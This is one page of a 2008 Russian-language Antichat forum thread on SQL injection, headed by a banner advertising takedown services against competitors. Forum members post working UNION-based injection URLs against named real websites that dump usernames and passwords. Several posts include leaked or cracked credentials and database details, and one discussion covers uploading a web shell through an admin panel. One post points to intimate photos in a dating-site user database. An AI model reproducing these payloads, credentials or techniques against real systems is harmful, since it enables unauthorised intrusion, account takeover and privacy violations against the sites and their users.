УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 570 из 1242

570

Опции темы

Поиск в этой теме

Опции просмотра

#5691

12.06.2008, 16:00

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

Цитата:

Сообщение от BlackSun

http://woonsanmall.com/shop/board/view.php?id=wdietinfo&ws=1&s=4_4&no=-1/**/union/**/select/**/0,1,2,name,password,5,6,7+from+gd_member/*

Дорк: inurl:"view.php?id=" inurl:"shop"

это не дорк. сайтов с такими урлами много

__________________

BlackHat.

MoDL

#5692

12.06.2008, 16:34

SUBJECT617

Познающий

Регистрация: 06.08.2007

Сообщений: 85

Провел на форуме:
1695462

Репутация: 91

Отправить сообщение для SUBJECT617 с помощью ICQ

Код:

http://proge.info/news/news.php?id=-1+union+select+1,2,user_password,username,5,6+from+users+limit+1,1/*

Могли бы хоть в библиотеке программистов не проглядеть это =\

====================================

Код:

http://www.zerecords.com/artists/artist.php?id=-19+union+select+1,login,passwd,4,5,6,7,8,9,10,11,12+from+user/*

Логин - admin, пароль - все остальное... Чет меня сначала смущала надпись сверху что я аж незаметил написанного чуть ниже 23...

Последний раз редактировалось SUBJECT617; 12.06.2008 в 17:55..

#5693

12.06.2008, 17:57

Shram-spb

Познающий

Регистрация: 06.06.2007

Сообщений: 83

Провел на форуме:
404154

Репутация: 140

Отправить сообщение для Shram-spb с помощью ICQ

Код:

http://torrentz.ru/search.php?kwds=ss'+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables/*&cat=0

#5694

12.06.2008, 18:09

SUBJECT617

Познающий

Регистрация: 06.08.2007

Сообщений: 85

Провел на форуме:
1695462

Репутация: 91

Код:

http://videoart.virtualmuseum.ca/artist.php?id=-13+union+select+1,username,user_password,user_email,5,6,7,8,9,10+from+drupal_DEV.bb_users+limit+0,1/*

About admin=) Красиво выдано.. Есть еще столбец user_icq. База кажется большая, я только непонял чо эт за сайт. Типа youtube вроде...

#5695

12.06.2008, 19:13

Shram-spb

Познающий

Регистрация: 06.06.2007

Сообщений: 83

Провел на форуме:
404154

Репутация: 140

Код:

http://www.afrodita.ru/fastsearch.php?genderme=1&genderyouu=2&foto=1&intim=0&age1=&age2=0'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,concat_ws(char(58),login,passw),1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+USERS/*

красота

большая база мыл.. если покапаться - можно найти интимные фотки

#5696

12.06.2008, 19:35

SUBJECT617

Познающий

Регистрация: 06.08.2007

Сообщений: 85

Провел на форуме:
1695462

Репутация: 91

Код:

http://www.warconent.com/artist.php?id=-12+union+select+1,phpQid,passwd,4,5,6,7,8,9,10,11,12,13,14+from+phpqadmin/*

Почемуто столбца с username небыло...

#5697

12.06.2008, 20:38

tor4)

Познающий

Регистрация: 27.05.2008

Сообщений: 51

Провел на форуме:
611529

Репутация: 41

http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e

http://psyedu.ru/admin

Мона через создании статьи залить shell???

#5698

12.06.2008, 20:40

s_p_a_m

Участник форума

Регистрация: 08.02.2008

Сообщений: 116

Провел на форуме:
1608432

Репутация: 158

_http://www.bsigroup.ru/outgoing/news.php?id=0%27+union+select+1,2,3,4,5,6,7,8,conc at_ws(0x3a,_login_xz,_pass_xz),10+from+_system_use r/*

login

assword в MD5

salzman:gctdlj
svetlana:789258

два штуки удалось расшифровать

Последний раз редактировалось s_p_a_m; 12.06.2008 в 20:43..

#5699

12.06.2008, 20:50

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Цитата:

Сообщение от tor4)

http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e

http://psyedu.ru/admin

Мона через создании статьи залить shell???

Можно,если админка php или ещё какая,но не html =_=.
Мне чето чаще попадаются именно хтмл =_=.Попробуй через аплоад(хотя врядли получицо).А вообще в каждой админке,если она не самописная,есь свои дыры =_=,а то придёццо искать исходники =________________=

Последний раз редактировалось Велемир; 12.06.2008 в 20:53..

#5700

12.06.2008, 21:33

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Отправить сообщение для MaSTeR GэN с помощью ICQ

просто обыныя страница

Код:

http://hayam.spinners.ru/view_thisf.php?i=-681%20union%20select%201,version(),3,4/*

VER:4.0.27-max-log
DB:zagorsk5
DBUSER:zagorsk5@v16.valuehost.ru

Страница 570 из 1242

570

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход